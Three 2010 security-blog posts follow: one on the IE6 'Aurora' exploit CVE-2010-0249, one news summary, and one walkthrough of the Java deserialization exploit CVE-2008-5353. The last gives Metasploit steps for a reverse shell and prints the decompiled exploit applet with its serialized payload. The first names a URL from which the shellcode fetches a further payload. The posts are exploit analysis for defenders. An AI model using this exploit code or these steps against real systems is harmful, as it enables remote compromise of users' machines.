Sunday, January 17, 2010

CVE-2010-0249 - Internet Explorer 6 mshtml.dll Remote Code Execution

Remote Code Execution in mshtml.dll in Internet Explorer 6


CVE-2010-0249 is a vulnerability utilized in Google targeted attack and it can be used to exploit one of the IE 6 DLL components mshtml.dll.

This post is to demonstrate the recently released Metasploit "Aurora" module that manipulate this exploit.





I am not able to post the exploit code here probably it was blocked by Google blog as the shellcode or the Javascript code is detected by them.







The shellcode  is obfuscated and I deobfuscate it using HIEW:



 

Obviously, the shellcode payload will download additional file from this URL: http://demo1.ftpaccess.cc/demo/ad.jpg and perform further malicious activities.

Reference

[1] http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js -- Wepawet analysis
[2] http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb -- ie_aurora.rb Metasploit Aurora Exploit Module

Friday, January 15, 2010

[News] Yet Another PDF & IE Attack

Yet Another PDF & IE Attack

If you do not know the recent Google attacks from Chinese people, you might want to visit F-Secure blog, http://www.f-secure.com/weblog/archives/00001854.html. As an abstract from F-Secure blog This is known to be another targeted attack from the cybercriminals to gain intellectual propery that is sensitive information in common from the China activist.

This attack is belived to be driven from the exploit of 0-day vulnerability for various well-known application like Adobe Acrobat/Reader and Internet Explorer 6, 7 and 8 and etc. The exploit will drop a DLL component which will be installed as a service and open the backdoor for the remote computer to fully compromise the infected machines. The description for this backdoor can be found from F-Secure description page or Symantec's Trojan.Hydraq.

SANS also provides an analysis for the PDF exploit which they call it "PDF Babushka". As a result of this attack, Google has announced to quit censoring google.cn, more information can be found from Official Google Blog: A new approach to China

Update (17/01/2010)

Wepawet was fist released the exploit code that is one of the attack vectors for the Google targeted attack. The exploit only affect IE 6 which has no DEP (Data Execution Prevention) enabled unlike IE 7 on Windows XP SP3 and IE 8.

Needless to say, the IE 6 contains lots of pontential 0 day vulnerabilites which has yet to be discovered. For Google targeted attacks, there should probably has other 0 day vulnerabilites for IE 7 and IE 8 which have not yet been revealed yet.
  

Reference

[1] http://isc.sans.org/diary.html?n&storyid=8002 -- Exploit code available for CVE-2010-0249
[2] http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js -- Exploit CVE-2010-0249 Source Code
[3] http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb -- Metasploit "Aurora" Module


~Signing off
@x9090





Saturday, January 9, 2010

CVE-2008-5353 - Old Java Exploit In the Wild

Java Calendar Deserialize Exploit In The Wild - CVE-2008-5353

This is my first post in 2010. Hurray &(^_^)&
Of course this is not the good news as there is Java exploit in the wild which is kinda out of date. The vulnerability has been documented as CVE-2008-5353.

The exploit utilizes java applet exploiting CVE-2008-5353. It is not hard to find the PoC (or real exploit) in the Internet as this exists quite some time. Since Metasploit already include the the PoC in the Framework, I will demonstrate the PoC:

  1. Select the exploit mutli/browser/java_calendar_deserialize
  2.  
     
  3. Set the payload generic/shell_reverse_tcp NOTE: generic/shell_bind_tcp does not work in this case


     

  4. Set the options. URIPATH can be any promising path name ;) LHOST is attacker's server address:
  5.  
     
     
  6. Recheck the options:
  7.  
     
  8. Execute the exploit:
  9.  
     
  10. From the remote computer 192.168.0.108, visit the URL http://192.168.0.108/sexy_bridtney and see the result:
  11.  
     
  12. 0wning... :)
  13.  
     
     
     

A quick glance of the exploit apple. This is actuallly the exploit code from Metasploit Applet.jar:

// Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.kpdus.com/jad.html
// Decompiler options: packimports(3)
// Source File Name:   AppletX.java

package msf.x;

import java.applet.Applet;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;

// Referenced classes of package msf.x:
//            PayloadX, LoaderX

public class AppletX extends Applet
{

    public AppletX()
    {
    }

    public void init()
    {
        try
        {
            ObjectInputStream oin = new ObjectInputStream(new ByteArrayInputStream(PayloadX.StringToBytes("ACED00057372001 B6A6176612E7574696C2E477265676F7269616E43616C656E6461728F3DD7 D6E5B0D0C10200014A0010677265676F7269616E4375746F7665727872001 26A6176612E7574696C2E43616C656E646172E6EA4D1EC8DC5B8E03000B5 A000C6172654669656C647353657449000E66697273744461794F665765656 B5A0009697354696D655365745A00076C656E69656E744900166D696E696D6 16C44617973496E46697273745765656B4900096E6578745374616D7049001 573657269616C56657273696F6E4F6E53747265616D4A000474696D655B000 66669656C64737400025B495B000569735365747400025B5A4C00047A6F6E6 57400144C6A6176612F7574696C2F54696D655A6F6E653B787001000000010 10100000001000000020000000100000121563AFC0E757200025B494DBA602 676EAB2A502000078700000001100000001000007D90000000400000015000 00004000000120000008A00000002000000030000000100000004000000100 000001100000022000002DEFE488C0000000000757200025B5A578F203914B 85DE2020000787000000011010101010101010101010101010101010173720 0186A6176612E7574696C2E53696D706C6554696D655A6F6E65FA675D60D15 EF5A603001249000A647374536176696E6773490006656E6444617949000C6 56E644461794F665765656B490007656E644D6F6465490008656E644D6F6E7 468490007656E6454696D6549000B656E6454696D654D6F646549000972617 74F666673657449001573657269616C56657273696F6E4F6E53747265616D4 90008737461727444617949000E73746172744461794F665765656B4900097 3746172744D6F646549000A73746172744D6F6E74684900097374617274546 96D6549000D737461727454696D654D6F64654900097374617274596561725 A000B7573654461796C696768745B000B6D6F6E74684C656E6774687400025 B42787200126A6176612E7574696C2E54696D655A6F6E6531B3E9F57744ACA 10200014C000249447400124C6A6176612F6C616E672F537472696E673B787 074000E416D65726963612F446177736F6E0036EE800000000000000000000 00000000000000000000000000000FE488C000000000200000000000000000 00000000000000000000000000000000000000000757200025B42ACF317F80 60854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1F770A000000060 000000000007571007E0006000000020000000000000000787372000D6D736 62E782E4C6F61646572585E8B4C67DDC409D8020000787078FFFFF4E2F964AC000A")));
            Object deserializedObject = oin.readObject();

            if(deserializedObject != null && LoaderX.instance != null)
            {
                String data = getParameter("data");
                String lhost = getParameter("lhost");
                String lport = getParameter("lport");
                if(data == null)
                    data = "";
                LoaderX.instance.bootstrapPayload(data, lhost, lport != null ? Integer.parseInt(lport) : 4444);
            }
        }
        catch(Exception exception) { }
    }

    private static final long serialVersionUID = 0xd30f41af207ff1c8L;
    private static final String serializedObject = "ACED00057372001B6A6176612E7574696C2E477265676F7269616E43616C6 56E6461728F3DD7D6E5B0D0C10200014A0010677265676F7269616E4375746 F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8D C5B8E03000B5A000C6172654669656C647353657449000E666972737444617 94F665765656B5A0009697354696D655365745A00076C656E69656E7449001 66D696E696D616C44617973496E46697273745765656B4900096E657874537 4616D7049001573657269616C56657273696F6E4F6E53747265616D4A00047 4696D655B00066669656C64737400025B495B000569735365747400025B5A4 C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6F6E653B787 00100000001010100000001000000020000000100000121563AFC0E757200 025B494DBA602676EAB2A502000078700000001100000001000007D9000000 040000001500000004000000120000008A0000000200000003000000010000 0004000000100000001100000022000002DEFE488C0000000000757200025B 5A578F203914B85DE202000078700000001101010101010101010101010101 01010101737200186A6176612E7574696C2E53696D706C6554696D655A6F6E 65FA675D60D15EF5A603001249000A647374536176696E6773490006656E6 444617949000C656E644461794F665765656B490007656E644D6F646549000 8656E644D6F6E7468490007656E6454696D6549000B656E6454696D654D6F6 4654900097261774F666673657449001573657269616C56657273696F6E4F6  E53747265616D490008737461727444617949000E73746172744461794F665  765656B49000973746172744D6F646549000A73746172744D6F6E746849000 9737461727454696D6549000D737461727454696D654D6F646549000973746 17274596561725A000B7573654461796C696768745B000B6D6F6E74684C656 E6774687400025B42787200126A6176612E7574696C2E54696D655A6F6E653 1B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537 472696E673B787074000E416D65726963612F446177736F6E0036EE8000000 0000000000000000000000000000000000000000000FE488C0000000002000 00000000000000000000000000000000000000000000000000000007572000 25B42ACF317F8060854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1 F770A000000060000000000007571007E00060000000200000000000000007 87372000D6D73662E782E4C6F61646572585E8B4C67DDC409D802000078707 8FFFFF4E2F964AC000A";
    public static String data = null;

}

The highlighted part is the hex data that contains the vulnerability that trigger the exploit and it will be converted to bytecode by java emulator.  More information can read the Reference section.


Reference

[1] http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html -- Calendar Bug
[2] http://www.metasploit.com/modules/exploit/multi/browser/java_calendar_deserialize -- Metasploit Module Browser - mutli/browser/java_calendar_deserialize
[3] http://isc.sans.org/diary.html?n&storyid=7879 -- Report of Java Object Serialization exploit in use in web drive-by attacks